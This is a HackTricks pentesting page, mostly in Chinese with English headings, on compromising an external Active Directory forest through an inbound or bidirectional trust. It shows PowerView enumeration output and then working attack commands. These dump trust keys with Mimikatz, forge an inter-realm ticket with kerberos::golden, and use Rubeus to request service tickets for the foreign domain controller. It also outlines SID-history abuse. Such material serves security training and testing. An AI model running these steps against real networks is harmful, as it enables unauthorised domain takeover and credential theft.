External Forest Domain - OneWay (Inbound) or bidirectional
支持 HackTricks
查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或 关注 我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。
在这种情况下,外部域信任你(或双方互相信任),因此你可以获得某种访问权限。
枚举
首先,你需要 枚举 信任:
Get-DomainTrust
SourceName : a.domain.local --> Current domain
TargetName : domain.external --> Destination domain
TrustType : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection : Inbound --> Inboud trust
WhenCreated : 2/19/2021 10:50:56 PM
WhenChanged : 2/19/2021 10:50:56 PM
# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external
# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain : domain.external
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain : domain.external
MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
DC=external
# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins
# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser
# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName : Administrators
MemberName : SUB\External Admins
SID : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup : True
IsDomain : True
# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
在之前的枚举中发现用户 crossuser
在 External Admins
组中,该组在 外部域的 DC 中具有 管理员访问权限。
初始访问
如果你 无法 在其他域中找到你的用户的任何 特殊 访问权限,你仍然可以返回到 AD 方法论,尝试从 无特权用户 提升权限(例如,进行 kerberoasting):
你可以使用 Powerview 函数 通过 -Domain
参数来 枚举 其他域,如:
Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
冒充
登录
使用具有访问外部域的用户凭据的常规方法,您应该能够访问:
Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
SID 历史滥用
您还可以在森林信任中滥用 SID 历史。
如果用户是 从一个森林迁移到另一个森林,并且 未启用 SID 过滤,则可以 添加来自另一个森林的 SID,并且在 跨信任 进行身份验证时,该 SID 将被 添加 到 用户的令牌 中。
作为提醒,您可以获取签名密钥。
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
您可以使用受信任的密钥对当前域用户进行TGT冒充签名。
# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
# Now you have a TGS to access the CIFS service of the domain controller
完全方式冒充用户
# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
# Now you have a TGS to access the CIFS service of the domain controller
支持 HackTricks
查看 订阅计划!
加入 💬 Discord 群组 或 电报群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。
Last updated